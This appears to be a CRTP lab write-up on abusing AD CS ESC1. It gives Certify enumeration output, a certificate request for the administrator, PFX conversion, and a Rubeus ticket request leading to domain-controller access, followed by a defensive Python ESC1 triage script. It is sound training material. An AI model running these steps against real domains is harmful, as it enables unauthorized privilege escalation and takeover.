CRTP Lab 21
Task 1
Check if AD CS is used by the target forest and find any vulnerable/abusable templates.
Use Certify to check for AD CS:
C:\AD\Tools\Certify.exe cas
[*] Enterprise/Enrollment CAs:
Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
UserSpecifiedSAN : Could not connect to the HKLM hive - Attempted to perform an unauthorized operation.
CA Permissions :
We can list all the templates using "find":
Certify.exe find
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
[snip]
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
[snip]
Task 2
Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.
To escalate to DA and EA with ESC1, we look for templates that carry the "ENROLLEE_SUPPLIES_SUBJECT" flag:
C:\AD\Tools>C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
The HTTPSCertificates template has the "ENROLLEE_SUPPLIES_SUBJECT" flag set, and enrollment rights on it are held by dcorp\RDPUsers.
Since the student user is a member of the RDPUsers group, we can request a certificate for any user as student.
Here we request a certificate for the Domain Administrator of the current domain:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
Copy all contents between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem.
We need to convert this to PFX before we can use it. Use the openssl binary to do this and set a password:
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
Use the PFX created above with Rubeus to request a TGT for DA:
# ArgSplit for asktgt
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
We can now access mcorp-dc:
C:\AD\Tools>winrs -r:mcorp-dc cmd /c set username
USERNAME=Administrator
C:\AD\Tools>winrs -r:mcorp-dc cmd /c set computername
COMPUTERNAME=MCORP-DC
C:\AD\Tools>
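As an added example (not part of the lab write-up or of Certify itself), a small Python triage script that parses Certify-style "find" output like the listings above and flags templates meeting all the ESC1 conditions this task relies on: subject supplied by the enrollee, no authorized signatures required, an authentication-capable EKU, and enrollment rights held by a non-privileged principal. The sample listing, its SIDs and the privileged-RID list are constructed assumptions, not lab data.

```python
import re
# Constructed sample in the "Key : Value" layout Certify prints; SIDs are shortened, not lab data.
SAMPLE = """\
Template Name : HTTPSCertificates
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
Enrollment Rights : dcorp\\RDPUsers S-1-5-21-11-22-33-1123
mcorp\\Domain Admins S-1-5-21-44-55-66-512
Template Name : SmartCardEnrollment-Agent
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
Enrollment Rights : dcorp\\Domain Users S-1-5-21-11-22-33-513
"""
# EKUs that make the issued certificate usable for logon; a template with no EKU at all also qualifies.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}
PRIVILEGED_RIDS = {"500", "512", "516", "519", "544"}  # assumed RIDs expected to hold rights on sensitive templates

def parse_templates(text):
    """Split Certify output into one dict per template; wrapped SID/flag lines join the previous key."""
    templates, current, last_key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if " : " in line:
            key, value = (s.strip() for s in line.split(" : ", 1))
            if key == "Template Name":
                current = {}
                templates.append(current)
            if current is not None:
                last_key = key.lower()
                current[last_key] = value
        elif current and last_key and (re.search(r"S-1-\d", line) or re.fullmatch(r"[A-Z_, ]+", line)):
            current[last_key] += " " + line  # continuation of a value wrapped onto the next line
    return templates

def find_esc1(text):
    """Return {template: [low-privileged enrollers]} for templates that meet every ESC1 condition."""
    findings = {}
    for t in parse_templates(text):
        ekus = {e.strip() for e in t.get("pkiextendedkeyusage", "").split(",") if e.strip()}
        principals = re.findall(r"(\S+\\.+?) (S-\d[\d-]*)", t.get("enrollment rights", ""))
        weak = [name for name, sid in principals if sid.rsplit("-", 1)[-1] not in PRIVILEGED_RIDS]
        if ("ENROLLEE_SUPPLIES_SUBJECT" in t.get("mspki-certificates-name-flag", "")  # requester picks the SAN
                and t.get("authorized signatures required", "0") == "0"             # no agent/manager approval
                and (not ekus or ekus & AUTH_EKUS)                                    # usable for logon
                and weak):                                                            # ordinary users can enroll
            findings[t["template name"]] = weak
    return findings
```

Feeding real `Certify.exe find` output into `find_esc1` gives a defender a quick shortlist of templates to fix by clearing the flag, requiring approval, or tightening enrollment ACLs.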